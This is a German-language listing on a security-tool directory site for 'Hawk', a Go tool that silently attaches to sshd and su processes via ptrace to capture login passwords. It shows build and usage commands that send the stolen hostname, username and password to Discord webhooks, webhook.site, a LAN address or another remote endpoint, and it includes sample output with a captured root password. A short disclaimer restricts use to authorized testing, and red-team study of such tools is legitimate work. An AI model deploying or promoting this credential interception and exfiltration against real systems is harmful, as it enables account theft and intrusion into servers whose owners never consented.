Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Hawk — Golang-Tool zum Exfiltrieren von Passwörtern, die über die Dienste sshd und su gefunden wurden. | Kitploit
Tools/GitHubGitHub/prodefense/hawk
PasswortangriffeDatenexfiltrationInformationsbeschaffungPost-ExploitationPenetrationstestsRed Teaming
GitHubprodefense/hawk

Hawk

Golang-Tool zum Exfiltrieren von Passwörtern, die über die Dienste sshd und su gefunden wurden.

Repository anzeigen
3863vor 9 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen



Hawk

Stilles Abfangen von SSH- und SU-Anmeldeinformationen in Echtzeit

Hawk überwacht sshd und su-Prozesse und extrahiert mithilfe von ptrace Passwörter aus dem Speicher, ohne Zielprozesse zu verändern. Null Schreibzugriffe. Reines, schreibgeschütztes Abfangen von Anmeldeinformationen.

Demo

Beispiel

Wie es funktioniert

Hawk nutzt das Linux-/proc-Dateisystem, um SSH- und SU-Prozesse zu entdecken, und verwendet dann ptrace, um sich anzuhängen und Syscalls abzufangen. Wenn die Passwortauthentifizierung erfolgt, liest es das Passwort direkt aus dem Prozessspeicher während des write()-Syscalls – völlig transparent für den Zielprozess. Die Anmeldeinformationen werden per Webhook exfiltriert oder an die Standardausgabe ausgegeben.

Ausführlicher Artikel: Blogbeitrag

Erstellen

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk

Verwendung

Discord-Webhook

Hawk erkennt Discord-Webhooks automatisch und sendet formatierte Nachrichten:

root@kitploit:~
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN

Einrichtung: Erstellen Sie einen Webhook in Ihrem Discord-Server gemäß der Anleitung zu Discord-Webhooks. Die Anmeldeinformationen erscheinen in Ihrem Kanal, formatiert mit Hostname, Benutzername und Passwort.

Generische Webhooks

Für andere Webhook-Dienste (webhook.site, benutzerdefinierte Server usw.):

root@kitploit:~
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id

# HTTP
./hawk http://192.168.1.100:6969/webhook

# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path

Stdout-Modus

Kein Webhook? Anmeldeinformationen werden in stdout ausgegeben:

root@kitploit:~
./hawk

Ausgabe:

root@kitploit:~
hostname=server01 username=root password=SuperSecret123

Voraussetzungen

  • Linux-System mit aktiviertem ptrace
  • /proc-Dateisystem eingehängt
  • Root-Rechte (für ptrace erforderlich)

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.

Danksagungen

Inspiriert von der Arbeit von blendin an 3snake.

Tool herunterladen